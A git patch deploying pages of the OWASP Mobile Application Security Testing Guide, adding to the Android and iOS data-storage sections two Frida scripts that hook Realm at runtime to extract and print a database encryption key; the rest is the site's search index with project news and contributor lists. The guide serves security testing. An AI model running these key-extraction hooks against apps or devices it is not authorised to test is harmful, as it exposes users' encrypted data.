From 38932a87c1881c859dd07e47e66e1f4e09239e75 Mon Sep 17 00:00:00 2001 From: <> Date: Thu, 2 May 2024 05:46:33 +0000 Subject: [PATCH] Deployed 52c8b71f with MkDocs version: 1.6.0 --- .../0x05d-Testing-Data-Storage/index.html | 60 +++++++++++++++++- .../iOS/0x06d-Testing-Data-Storage/index.html | 41 ++++++++++++ search/search_index.json | 2 +- sitemap.xml.gz | Bin 127 -> 127 bytes 4 files changed, 101 insertions(+), 2 deletions(-) diff --git a/MASTG/Android/0x05d-Testing-Data-Storage/index.html b/MASTG/Android/0x05d-Testing-Data-Storage/index.html index 6c737f99ef..a85818e997 100644 --- a/MASTG/Android/0x05d-Testing-Data-Storage/index.html +++ b/MASTG/Android/0x05d-Testing-Data-Storage/index.html @@ -12219,7 +12219,65 @@
If the database is not encrypted, you should be able to obtain the data. If the database is encrypted, determine whether the key is hard-coded in the source or resources and whether it is stored unprotected in shared preferences or some other location.
+Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice).
+However, if an attacker has sufficient access to the device (e.g. root access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
+'use strict';
+
+function modulus(x, n){
+ return ((x % n) + n) % n;
+}
+
+function bytesToHex(bytes) {
+ for (var hex = [], i = 0; i < bytes.length; i++) { hex.push(((bytes[i] >>> 4) & 0xF).toString(16).toUpperCase());
+ hex.push((bytes[i] & 0xF).toString(16).toUpperCase());
+ }
+ return hex.join("");
+}
+
+function b2s(array) {
+ var result = "";
+ for (var i = 0; i < array.length; i++) {
+ result += String.fromCharCode(modulus(array[i], 256));
+ }
+ return result;
+}
+
+// Main Modulus and function.
+
+if(Java.available){
+ console.log("Java is available");
+ console.log("[+] Android Device.. Hooking Realm Configuration.");
+
+ Java.perform(function(){
+ var RealmConfiguration = Java.use('io.realm.RealmConfiguration');
+ if(RealmConfiguration){
+ console.log("[++] Realm Configuration is available");
+ Java.choose("io.realm.Realm", {
+ onMatch: function(instance)
+ {
+ console.log("[==] Opened Realm Database...Obtaining the key...")
+ console.log(instance);
+ console.log(instance.getPath());
+ console.log(instance.getVersion());
+ var encryption_key = instance.getConfiguration().getEncryptionKey();
+ console.log(encryption_key);
+ console.log("Length of the key: " + encryption_key.length);
+ console.log("Decryption Key:", bytesToHex(encryption_key));
+
+ },
+ onComplete: function(instance){
+ RealmConfiguration.$init.overload('java.io.File', 'java.lang.String', '[B', 'long', 'io.realm.RealmMigration', 'boolean', 'io.realm.internal.OsRealmConfig$Durability', 'io.realm.internal.RealmProxyMediator', 'io.realm.rx.RxObservableFactory', 'io.realm.coroutines.FlowFactory', 'io.realm.Realm$Transaction', 'boolean', 'io.realm.CompactOnLaunchCallback', 'boolean', 'long', 'boolean', 'boolean').implementation = function(arg1)
+ {
+ console.log("[==] Realm onComplete Finished..")
+
+ }
+ }
+
+ });
+ }
+ });
+}
+
You can save files to the device's internal storage. Files saved to internal storage are containerized by default and cannot be accessed by other apps on the device. When the user uninstalls your app, these files are removed. The following code snippets would persistently store sensitive data to internal storage.
diff --git a/MASTG/iOS/0x06d-Testing-Data-Storage/index.html b/MASTG/iOS/0x06d-Testing-Data-Storage/index.html index 70f6503ad1..a35b27f46b 100644 --- a/MASTG/iOS/0x06d-Testing-Data-Storage/index.html +++ b/MASTG/iOS/0x06d-Testing-Data-Storage/index.html @@ -12021,6 +12021,47 @@Access to the data depends on the encryption: unencrypted databases are easily accessible, while encrypted ones require investigation into how the key is managed - whether it's hardcoded or stored unencrypted in an insecure location such as shared preferences, or securely in the platform's KeyStore (which is best practice). +However, if an attacker has sufficient access to the device (e.g. jailbroken access) or can repackage the app, they can still retrieve encryption keys at runtime using tools like Frida. The following Frida script demonstrates how to intercept the Realm encryption key and access the contents of the encrypted database.
+function nsdataToHex(data) {
+ var hexStr = '';
+ for (var i = 0; i < data.length(); i++) {
+ var byte = Memory.readU8(data.bytes().add(i));
+ hexStr += ('0' + (byte & 0xFF).toString(16)).slice(-2);
+ }
+ return hexStr;
+}
+
+function HookRealm() {
+ if (ObjC.available) {
+ console.log("ObjC is available. Attempting to intercept Realm classes...");
+ const RLMRealmConfiguration = ObjC.classes.RLMRealmConfiguration;
+ Interceptor.attach(ObjC.classes.RLMRealmConfiguration['- setEncryptionKey:'].implementation, {
+ onEnter: function(args) {
+ var encryptionKeyData = new ObjC.Object(args[2]);
+ console.log(`Encryption Key Length: ${encryptionKeyData.length()}`);
+ // Hexdump the encryption key
+ var encryptionKeyBytes = encryptionKeyData.bytes();
+ console.log(hexdump(encryptionKeyBytes, {
+ offset: 0,
+ length: encryptionKeyData.length(),
+ header: true,
+ ansi: true
+ }));
+
+ // Convert the encryption key bytes to a hex string
+ var encryptionKeyHex = nsdataToHex(encryptionKeyData);
+ console.log(`Encryption Key Hex: ${encryptionKeyHex}`);
+ },
+ onLeave: function(retval) {
+ console.log('Leaving RLMRealmConfiguration.- setEncryptionKey:');
+ }
+ });
+
+ }
+
}
The OWASP Mobile Application Security (MAS) flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MASTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
Download the MASVS Download the MASTG Download the Checklist "},{"location":"#trusted-by","title":"Trusted By","text":"The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"#mas-advocates","title":"\ud83e\udd47 MAS Advocates","text":"
MAS Advocates are key industry adopters of the OWASP MASVS and MASTG who have invested a significant and consistent amount of resources to drive the project forward and ensure its continued success. This includes making consistent high-impact contributions and actively promoting the adoption and usage of the project. Learn more.
"},{"location":"contact/","title":"\ud83d\udcac Connect with Us","text":"You can follow and reach out to the OWASP MAS team in many ways.
If you'd like to contribute, take a look at our Contributions page or reach out to the project leaders Carlos or Sven.
Request an invitation to join our Slack channel #project-mobile-app-security
Carlos is a mobile security research engineer who has gained many years of hands-on experience in the field of security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"contact/#sven-schleier","title":"Sven Schleier","text":"
Sven is an experienced web and mobile penetration tester and assessed everything from historic Flash applications to progressive mobile apps. He is also a security engineer that supported many projects end-to-end during the SDLC to \"build security in\". He was speaking at local and international meetups and conferences and is conducting hands-on workshops about web application and mobile app security.
"},{"location":"contributing/","title":"Contributing to the MAS Project","text":"
First of all, \u2b50 Give us a Star in GitHub!
The MAS project is an open source effort and we welcome all kinds of contributions and feedback.
Help us improve & join our community:
Contribute with content:
Before you start contributing, please check our pages \"How Can You Contribute?\" and \"Getting Started\". If you have any doubts please contact us.
"},{"location":"contributing/#what-not-to-do","title":"\ud83d\udeab What not to do","text":"Although we greatly appreciate any and all contributions to the project, there are a few things that you should take into consideration:
Please be sure to take a careful look at our Code of Conduct for all the details and ask us in case of doubt.
"},{"location":"contributing/#our-contributors","title":"Our Contributors","text":"All of our contributors are listed in GitHub repos. See OWASP MASTG Authors & Co-Authors, MASTG Contributors and MASVS Contributors.
Update March 2023: We're creating a new concept for contributions that aligns with the new MASTG v2 workflows. Stay tuned...
"},{"location":"contributing/#owasp-mas-project-featured-contributions","title":"OWASP MAS Project Featured Contributions","text":"Coming soon...
"},{"location":"contributing/#owasp-mastg-v2","title":"OWASP MASTG V2","text":"Coming soon...
"},{"location":"contributing/#owasp-masvs-v1","title":"OWASP MASVS V1","text":"The latest version of the MASVS v1 including all translations is available here: https://github.com/OWASP/owasp-masvs/releases/tag/v1.5.0
Project Lead Lead Author Contributors and Reviewers Sven Schleier and Carlos Holguera Bernhard Mueller, Sven Schleier, Jeroen Willemsen and Carlos Holguera Alexander Antukh, Mesheryakov Aleksey, Elderov Ali, Bachevsky Artem, Jeroen Beckers, Jon-Anthoney de Boer, Ben Cheney, Will Chilcutt, Stephen Corbiaux, Ratchenko Denis, Ryan Dewhurst, @empty_jack, Ben Gardiner, Manuel Delgado, Anton Glezman, Josh Grossman, Sjoerd Langkemper, Vin\u00edcius Henrique Marangoni, Martin Marsicano, Roberto Martelloni, @PierrickV, Julia Potapenko, Andrew Orobator, Mehrad Rafii, Javier Ruiz, Abhinav Sejpal, Stefaan Seys, Yogesh Sharma, Prabhant Singh, Nikhil Soni, Anant Shrivastava, Francesco Stillavato, Abdessamad Temmar, Pauchard Thomas, Lukasz Wierzbicki Language Translators & Reviewers Brazilian Portuguese Mateus Polastro, Humberto Junior, Rodrigo Araujo, Maur\u00edcio Ariza, Fernando Galves Chinese (Traditonal) Peter Chi, Lex Chien, Henry Hu, Leo Wang Chinese (Simplified) Bob Peng, Harold Zang, Jack S French Romuald Szkudlarek, Abderrahmane Aftahi, Christian Dong (Review) German Rocco Gr\u00e4nitz, Sven Schleier (Review) Hindi Mukesh Sharma, Ritesh Kumar, Kunwar Atul Singh, Parag Dave, Devendra Kumar Sinha, Vikrant Shah Japanese Koki Takeyama, Riotaro Okada (Review) Korean Youngjae Jeon, Jeongwon Cho, Jiyou Han, Jiyeon Sung Persian Hamed Salimian, Ramin Atefinia, Dorna Azhirak, Bardiya Akbari, Mahsa Omidvar, Alireza Mazhari, Milad Khoshdel Portuguese Ana Filipa Mota, Fernando Nogueira, Filipa Gomes, Luis Fontes, S\u00f3nia Dias Russian Gall Maxim, Eugen Martynov, Chelnokov Vladislav, Oprya Egor, Tereshin Dmitry Spanish Martin Marsicano, Carlos Holguera Turkish An\u0131l Ba\u015f, Haktan Emik Greek Panagiotis Yialouris"},{"location":"contributing/#owasp-mastg-v1","title":"OWASP MASTG V1","text":"The latest version of the MASTG v1 is available here: https://github.com/OWASP/owasp-mastg/releases/tag/v1.5.0
Note: This contributor table is generated based on our GitHub contribution statistics. For more information on these stats, see the GitHub Repository README. We manually update the table, so be patient if you're not listed immediately.
We thank our donators for providing the funds to support us on our project activities.
The OWASP Foundation is very grateful for the support by the individuals and organizations listed. However please note, the OWASP Foundation is strictly vendor neutral and does not endorse any of its supporters. Donations do not influence the content of the MASVS or MASTG in any way.
While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes a little bit of outside help is required.
Monetary Donations: You can donate any amount you like, no matter how small, anyone can help. From 500$ up you may select a Donation Package and be listed as a donator.
100% of the funds go to the OWASP Foundation and allow us funding our project activities such as contracting technical editors, graphic designers, software developers, purchasing test devices, creating swag, etc.
Donate Purchase the MASTG
Effort Based: You can instead support the project by contributing with your work and end up at our acknowledgement section.
If you're a company, consider becoming a \"MAS Advocate\" which is the highest status that companies can achieve in the project acknowledging that they've gone above and beyond to support the project.
Contribute Become a MAS Advocate
"},{"location":"news/","title":"\ud83d\uddde News","text":"Tip: Follow us on Twitter!
Follow @OWASP_MAS to get the latest updates instantly.
"},{"location":"news/#feb-19th-2024-new-standard-for-secure-mobile-app-transactions-based-on-the-owasp-masvs-by-the-cyber-security-agency-of-singapore","title":"Feb 19th, 2024: New Standard for Secure Mobile App Transactions based on the OWASP MASVS by the Cyber Security Agency of Singapore","text":"The Cyber Security Agency of Singapore (CSA) launched the \"Safe App Standard\" on January 10, 2024. Tailored for local app developers and service providers, this guideline is based on the OWASP Mobile Application Security Verification Standard (MASVS) and focuses on critical areas such as authentication and authorization (MASVS-AUTH), data storage (MASVS-STORAGE), and tamper resistance (MASVS-RESILIENCE). The initiative aims to protect apps from common cyber threats and ensure a safer digital space for users.
While the Safe App Standard is a significant step forward in securing mobile applications, developers are encouraged to consider the full MASVS and select the appropriate MAS profiles for comprehensive protection. This holistic approach to app security ensures that apps go beyond meeting the baseline and are protected against a wider range of cyber threats, providing robust security for end users.
"},{"location":"news/#jan-18th-2024-masvs-v210-release-masvs-privacy","title":"Jan 18th, 2024: MASVS v2.1.0 Release & MASVS-PRIVACY","text":"
We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.1.0 including the new MASVS-PRIVACY category and CycloneDX support.
"},{"location":"news/#masvs-privacy","title":"MASVS-PRIVACY","text":"After collecting and processing all feedback from the MASVS-PRIVACY Proposal we're releasing the new MASVS-PRIVACY category.
The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
The new controls are:
The MASVS is now available in CycloneDX format (OWASP_MASVS.cdx.json), a widely adopted standard for software bill of materials (SBOM). This format enables easier integration and automation within DevOps pipelines, improving visibility and management of mobile app security. By using CycloneDX, developers and security teams can more efficiently assess, track and comply with MASVS requirements, resulting in more secure mobile applications.
"},{"location":"news/#jan-11th-2024-mobile-application-risk-scoring-qa","title":"Jan 11th, 2024: Mobile Application Risk Scoring Q&A","text":"We've received many comments and excellent questions, which we've compiled and summarized, along with the authors' answers. We'd like to thank everyone who took the time to read the document and especially those who asked valuable questions.
See Mobile Application Risk Scoring Q&A
"},{"location":"news/#oct-10th-2023-masvs-privacy","title":"Oct 10th, 2023: MASVS-PRIVACY","text":"Mobile applications frequently access sensitive user data to deliver their core functionalities. This data ranges from personally identifiable information (PII), health metrics, location data, to device identifiers. Mobile devices are a constant companion to users, always connected, and equipped with numerous sensors\u2014including cameras, microphones, GPS and BLE\u2014that generate data capable of inferring user behavior and even identifying individuals. The landscape is further complicated by advanced tracking techniques, the integration of third-party SDKs, and a heightened awareness of privacy issues among users and regulators. As a response, there's a growing trend towards on-device processing to keep user data localized and more secure.
Today we're excited to announce the release of the new MASVS-PRIVACY, a new MASVS category and MAS profile with focus on privacy. The new profile is designed to help organizations and individuals assess the privacy implications of their mobile applications and make informed decisions.
The new controls are:
The proposal defines the scope of the new MASVS-PRIVACY category and profile, and includes a detailed description of each control, a rationale, and a list of tests. The new profile MAS-P, establishes a baseline for privacy and is intended to work cohesively, and in some cases even overlap, with other OWASP MAS profiles, such as MAS-L1 and MAS-L2, ensuring a holistic approach to both security and privacy.
Call to Action:
We'd be thrilled to hear what you think! Your input is really important to us, and it can make a big difference in shaping the final version of the document. Please take a moment to review it and share your comments, feedback, and ideas.
Review Timeline: until November 30, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1jq7V9cRureRFF_XT7d_Z9H_SLsaFs43cE50k6zMRu0Q/edit?usp=sharing
"},{"location":"news/#sept-29th-2023-mastg-refactor-part-2-techniques-tools-reference-apps","title":"Sept 29th, 2023: MASTG Refactor Part 2 - Techniques, Tools & Reference Apps","text":"We are thrilled to announce the second phase of the MASTG (Mobile Application Security Testing Guide) refactor. These changes aim to enhance the usability and accessibility of the MASTG.
The primary focus of this new refactor is the reorganization of the MASTG content into different components, each housed in its dedicated section/folder and existing now as individual pages in our website (markdown files with metadata/frontmatter in GitHub):
Tests:
tests/
folder.MASTG-TEST-XXXX
.Techniques:
techniques/
folder.MASTG-TECH-XXXX
.Tools:
tools/
folder.MASTG-TOOL-XXXX
.Apps:
apps/
folder.MASTG-APP-XXXX
.We hope that the revamped structure enables you to navigate the MASTG more efficiently and access the information you need with ease.
"},{"location":"news/#sep-20th-2023-request-for-community-review-new-risk-assessment-formula-for-mobile-applications","title":"Sep 20th, 2023: Request for Community Review: New Risk Assessment Formula for Mobile Applications","text":"We are excited to announce the release of a new collaborative effort between industry, academia, and the OWASP Mobile Application Security (MAS) project. This document introduces a novel formula designed to measure the risk associated with mobile applications.
Document Highlights:
Call to Action:
We invite you to review the document and share your comments, feedback, and suggestions. Your insights are invaluable to us and will contribute significantly to the final version.
Review Timeline: until October 31, 2023
Please follow the link here to access the document: https://docs.google.com/document/d/1dnjXoHpVL5YmZTqVEC9b9JOfu6EzQiizZAHVAeDoIlo/edit?usp=sharing
By collaborating on this initiative, we aim to provide a structured and flexible framework for risk assessment that assists organizations and individuals in making informed security decisions. We look forward to your active participation and valuable feedback!
"},{"location":"news/#jul-28th-2023-mas-testing-profiles-and-mastg-atomic-tests-paving-the-way-for-next-level-mobile-application-security","title":"Jul 28th, 2023: MAS Testing Profiles and MASTG Atomic Tests - Paving the Way for Next-Level Mobile Application Security","text":"The MASTG refactoring is a significant upgrade that addresses some existing challenges and introduces exciting new features. It aims to streamline compliance, simplify testing and improve usability for security testers and other stakeholders.
"},{"location":"news/#mas-testing-profiles","title":"MAS Testing Profiles","text":"As part of the MASVS refactoring, we've replaced the three traditional verification levels (L1, L2, and R) with security testing profiles in the MASTG. These new profiles are designed to enhance our ability to capture various security nuances associated with mobile apps, allowing us to evaluate different situations for the same MASVS control. For instance, in MASVS-STORAGE-1, it's acceptable to store data unencrypted in app internal storage for MAS-L1, but MAS-L2 requires data encryption.
The new MAS Testing Profiles include revamped versions of the traditional levels and one new addition:
Another interesting addition we're exploring for the near future is a 'Privacy' profile, which would focus on tests that consider the privacy implications of various app features and functionalities. We believe that this profile can become an essential tool in an era where privacy has become a significant concern.
HELP WANTED: Today we're releasing the new MAS Testing Profiles and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#atomic-tests","title":"Atomic Tests","text":"One of the key changes in the MASTG refactoring is the introduction of the new MASTG Atomic Tests. The existing tests are currently quite large and often cover more than one MASVS control. With the introduction of Atomic Tests, we'll break these tests down into smaller, more manageable pieces. Our goal is to make these tests as self-contained and specific as possible to allow for reduced ambiguity, better understanding and easier execution. Each atomic test will have its unique ID for easy reference and traceability and will be mapped to the relevant controls from the MASVS.
But before we can start writing the new atomic tests, we need to finalize the proposal for the new MASTG Atomic Tests including mappings to the MASVS controls and the new MAS Testing profiles.
HELP WANTED: Today we're releasing the new MASTG Atomic Tests Proposal and would love to hear what you think. Please give your feedback here until the 31st of August 2023.
"},{"location":"news/#whats-next","title":"What's Next?","text":"We are now in the process of transforming the MASTG, according to the changes highlighted above. We've already released the MASVS v2.0.0, and the rest of the year will be dedicated to the MASTG refactoring, which will involve creating hundreds of new tests. We believe these changes will significantly improve the usability and relevance of the MASTG. We're excited to keep you updated on our progress and look forward to your continued support and feedback.
We would like to extend a special thanks to our MAS Advocate NowSecure. Their commitment to the OWASP project is not merely financial; it\u2019s an investment of their most valuable resource \u2013 their people and their time. NowSecure has dedicated hours of expertise, extensive knowledge, and hard work towards making these changes a reality.
Would you like to become a MAS Advocate? Contact us to learn more.
A huge thanks goes of course to our wider community and all of our contributors. Your continuous participation and input have been instrumental in the evolution of the OWASP MAS project. It is through this collaborative effort that we can truly advance in the field of mobile app security. Thank you for being a part of this journey!
"},{"location":"news/#may-8th-2023-masvs-v2-colors","title":"May 8th, 2023: MASVS v2 Colors","text":"We're bringing official colors to the MASVS! The new colors will be used across the MASVS v2.0.0 and MASTG v2.0.0 to help users quickly identify the different control groups. We've also revamped certain areas of our website to make them more readable and easier to navigate as well as to prepare for what's coming with the MASTG v2.0.0 (keyword: \"atomic tests\").
"},{"location":"news/#masvs","title":"MASVS","text":"
In the MASVS home page, the new colors will be used to highlight the different control groups.
The individual controls will also be color-coded to help users quickly identify the different control groups. We've also redesigned the control pages to make them more readable and easier to navigate.
"},{"location":"news/#mastg","title":"MASTG","text":"
Now, when you navigate to the MASTG tests, you'll see that they are categorized by platform (Android/iOS) as well as by MASVS category, also using our new colors in the sidebar. The colors will also be used to highlight the different control groups in the test description.
Each test now contains a header section indicating the platform, the MASVS v1.5.0 controls, and the MASVS v2.0.0 controls.
We've also introduced a new section called \"Resources\" which is automatically generated using the inline links within the MASTG pages and serve as a quick reference to the most important resources for each test.
NOTE: The MASTG tests themselves haven't changed yet, we're still working on the refactoring. For now we've simply split the tests into individual pages to make them easier to navigate and reference. This will facilitate the work on the refactoring and the introduction of the new atomic tests.
"},{"location":"news/#mas-checklist","title":"MAS Checklist","text":"The MAS Checklist pages and the MAS checklist itself have also been updated to use the new colors to highlight the different control groups and to make them easier to navigate.
When you click on a MASVS group you'll see a table listing the new MASVS v2.0.0 controls as well as the corresponding MASTG tests (v1.5.0) for both the Android and the iOS platforms.
NOTE: The checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
We hope you like the new colors and the changes we've made to the website. We're looking forward to your feedback! Please use our GitHub Discussions to post any questions or ideas you might have. If you see something wrong please let us know by opening a bug issue.
"},{"location":"news/#april-1st-2023-masvs-v200-release","title":"April 1st, 2023: MASVS v2.0.0 Release","text":"We are thrilled to announce the release of the new version of the OWASP Mobile Application Security Verification Standard (MASVS) v2.0.0. With this update, we have set out to achieve several key objectives to ensure that MASVS remains a leading industry standard for mobile application security.
We believe that these changes will make the OWASP MASVS v2.0.0 an even more valuable resource for developers and security practitioners alike, and we are excited to see how the industry embraces these updates.
The MASVS v2.0.0 was presented at the OWASP AppSec Dublin 2023, you can watch the presentation \u25b6\ufe0f here.
"},{"location":"news/#why-are-there-no-levels-in-the-new-masvs-controls","title":"Why are there no levels in the new MASVS controls?","text":"The Levels you already know (L1, L2 and R) will be fully reviewed and backed up with a corrected and well-documented threat model.
Enter MAS Profiles: We are moving the levels to the MASTG tests so that we can evaluate different situations for the same control (e.g., in MASVS-STORAGE-1, it's OK to store data unencrypted in app internal storage for L1, but L2 requires data encryption). This can lead to different tests depending on the security profile of the application.
"},{"location":"news/#transition-phase","title":"Transition Phase","text":"The MASTG, in its current version v1.5.0, currently still supports the MASVS v1.5.0. Bringing the MASTG to v2.0.0 to be fully compatible with MASVS v2.0.0 will take some time. That's why we need to introduce a \"transition phase\". We're currently mapping all new proposed test cases to the new profiles (at least L1 and L2), so even if the MASTG refactoring is not complete, you'll know what to test for, and you'll be able to find most of the tests already in the MASTG.
We thank everyone that has participated in the MASVS Refactoring. You can access all Discussion and documents for the refactoring here.
You'll notice that we have one new author in the MASVS: Jeroen Beckers
Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
\ud83d\udc99 Special thanks to our MAS Advocate, NowSecure, who has once again demonstrated their commitment to the project by continuously supporting it with time/dedicated resources as well as feedback, data and content contributions.
"},{"location":"news/#august-23rd-2022-project-rebranding-to-owasp-mas","title":"August 23rd, 2022: Project Rebranding to OWASP MAS","text":"
Until now our project was called the \"OWASP Mobile Security Testing Guide (MSTG)\" project. Unfortunately, this was a source of confusion since we happen to have a resource with the same name, the OWASP MSTG. Not only that, that name doesn't reflect the full scope and reach of our project. Have you ever wondered why the MSTG is called MSTG and not MASTG? Both documents are about Mobile Application Security and we'd like to make that clear.
Today we are rebranding our project to \u201cOWASP Mobile App Security (MAS)\u201d. The OWASP MAS project includes:
We see MAS reflecting all the consistency, structure and transparency that we\u2019re bringing with our 2.0 versions.
The rebranding will happen gradually so expect changes to be rolled out over the upcoming days/weeks.
"},{"location":"news/#february-7th-2022-nist-800-218-recommendations-for-mitigating-the-risk-of-software-vulnerabilities","title":"February 7th, 2022: NIST 800-218 - Recommendations for Mitigating the Risk of Software Vulnerabilities","text":"We're happy to share the new NIST 800-218 (Feb 2022) mapping to the latest MASVS v1.4.2 (Jan 2022) especially MASVS-ARCH and MASVS-CODE:
\"Secure Software Development Framework (SSDF) v1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities\"
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
"},{"location":"news/#november-17th-2021-from-slack-to-github-discussions","title":"November 17th, 2021: From Slack to GitHub Discussions","text":"Hello everyone,
times change, our project evolves and being able to hear you and discuss with you all is key for the OWASP MSTG project.
TL;DR: we deprecate Slack in favor of GitHub Discussions as our primary communication channel.
https://github.com/OWASP/owasp-mastg/discussions/ https://github.com/OWASP/owasp-masvs/discussions/
"},{"location":"news/#removing-obstacles","title":"Removing obstacles","text":"Until now we've driven all discussion on the MSTG Slack channel, to participate you had to get Slack, find the invite link (hope that it's still valid, else report it), go to our channel and post your question. It could really be a hurdle some times and some questions might be missed, there was also no way to up-vote them or keep track.
All our contributors do have a GitHub account (or should! now you have a reason :) ). So, from today on we move to GitHub discussions and deprecate Slack as the primary communication channel. You can still reach us there for private messages though and we will try to relay the discussions to Slack ASAP, but just as notifications (no Q&A over there).
Discussions provides a place to bring all those conversations together right next to your code. Whether it\u2019s asking questions, sharing announcements, or featuring important information, it\u2019s all in one place and easily accessible to contributors and community members alike.
"},{"location":"news/#separation","title":"Separation","text":"We want to separation regarding actionable things to do (issues) and ideas/proposals (now \"Ideas\" Discussion). Having it all in GitHub makes it sooo much easier for us to manage, reference, etc.
Think of it this way: Discussions are for talking and GitHub Issues are for doing. This helps minimize distractions, keep teams on track, and address topics and questions clearly in a dedicated forum. Plus, you can move seamlessly between the two as well by converting an issue to a discussion and vice versa with a simple click.
"},{"location":"news/#insights","title":"Insights","text":"Soon we will be able to see insights regarding the discussions. You guessed it, we'll take that into account and acknowledge your contribution to the discussions as we do with the content itself. More details on this once we can test the feature.
"},{"location":"news/#roadmap","title":"Roadmap","text":"or:
For this announcement we partially mapped this nice GitHub article to our project (recommended read): https://github.blog/2021-11-10-7-unique-software-collaboration-features-in-github-discussions/
"},{"location":"news/#may-23rd-2020-new-build-system-and-release-upcoming","title":"May 23rd 2020: New build system and release upcoming!","text":"As already shared during the virtual Dutch Chapter meetup: we are going to release a new version of the MSTG soon. We have been quite busy with moving it to the new build system first as the document got too large for our old tooling. This is a great incentive as well to think of how we can make the guide more focused so that the size does not matter ;-)
More news on the new release will follow soon...
"},{"location":"news/#april-10th-2020-stayhome-and-share-your-knowledge","title":"April 10th 2020: #StayHome and share your knowledge!","text":"Hi everybody,
we are all in more or less restrictive lock-down situations, but the guideline is always #StayHome. This is definitely a challenging time for you, but also us. But luckily it was also never easier to collaborate and share, through so many different tools and platforms.
The OWASP Mobile Security Testing Guide (MSTG) project team wants to encourage people to #StayHome and also use this time to share your knowledge with the community. So if you want to either share your knowledge in mobile security or are just keen in doing some research in this area, we have many open issues where we are still looking for volunteers.
If you can close 5 issues that we marked with the tag #StayHome we will sent you in return a hard copy of the OWASP MSTG! We are giving away a total of 5 books on a first come first serve basis.
If you are interested, do the following:
Go through the open issues in our Github repo with the tag #StayHome.
Make a comment on the issue that you would like to take care of, which will be assigned on a first come first serve basis. For any clarifications you can ping either Carlos or Sven in OWASP Slack. If you don't have an account yet, please check here on how to register.
Work on the issue and create a Pull Request (PR). If you are new to Git(hub), check out our contribution guide for further details.
We will review the PR and merge once all comments are addressed/resolved.
Start at 1. :-)
We would love to have you as a contributor. Feel free to share the mail or like our tweet
Stay safe, take care and #StayHome!
Sven, Jeroen and Carlos
"},{"location":"news/#march-17th-2020-international-release-of-masvs-12","title":"March 17th, 2020: International release of MASVS 1.2","text":"A new version of the OWASP Mobile Application Security Standard (MASVS) was released! The MASVS establishes baseline security requirements for mobile apps and summarizes them in one standard. With this new release we achieved a significant alignment and coverage with existing mobile security documents from ENISA, older NIST documents, OWASP Mobile top 10, and others. The new version 1.2 is available in Github Releases: https://github.com/OWASP/owasp-masvs/releases/tag/v1.2. For more details please look into our Release Notes for Version 1.2 and Version 1.2-RC https://github.com/OWASP/owasp-mastg/releases/tag/v1.2.
Thanks to the great support of our community we have now 9 different languages available in total for the MASVS and would like to thank all of our translators for their great work and support throughout:
The MASVS and its translations are available in PDF, Mobile, ePub, docx and you can also read it via Gitbook. See here for details: https://github.com/OWASP/owasp-masvs/releases
The project team (Sven Schleier, Jeroen Willemsen and Carlos Holguera) would like to thank all the contributors, translators and those who build the improved automation around it and all their hard work and support in the last few months! New releases will be much faster thanks to our GitHub actions and Docker containers. Next to that, we are happy to add Korean and Chinese Simplified to our ever growing list of translations! We will finalize the document generation system and then apply the same build system to the Mobile Security Testing Guide (MSTG) in order to speed up the release process and release more frequently.
"},{"location":"news/#october-4th-2019-pre-release-of-masvs-12","title":"October 4th, 2019: Pre-release of MASVS 1.2!","text":"We have a pre-release of MASVS Version 1.2. This will be the reference document for further translations.
"},{"location":"news/#october-2nd-2019-mstg-playground-release","title":"October 2nd, 2019: MSTG Playground Release!","text":"Want more training apps? We hear you! We just released the MSTG-Android-Java & MSTG-Android-Kotlin for Android and the MSTG-JWT app for iOS. Come and check it out at the release page! With special thanks to Sven Schleier (@sushi2k), Wen Bin Kong (@kongwenbin), Nikhil Soni (@nikhil), and Ryan Teoh (@ryantzj).
"},{"location":"news/#october-2nd-2019-mstg-project-joins-hacktoberfest","title":"October 2nd, 2019: MSTG Project joins Hacktoberfest!","text":"We are joining the #hacktoberfest October 2-31. Check out our issues at Github. Register at https://hacktoberfest.digitalocean.com.
"},{"location":"news/#september-17th-2019-xamarin-experiment","title":"September 17th, 2019: Xamarin experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-flutter-experiment","title":"September 6th, 2019: Flutter experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
"},{"location":"news/#september-6th-2019-react-native-experiment","title":"September 6th, 2019: React native experiment!","text":"We have launched a react-native experiment based on our compliance checklist. Want to teach others how to validate React Native apps against the MASVS? Check this Google sheet!
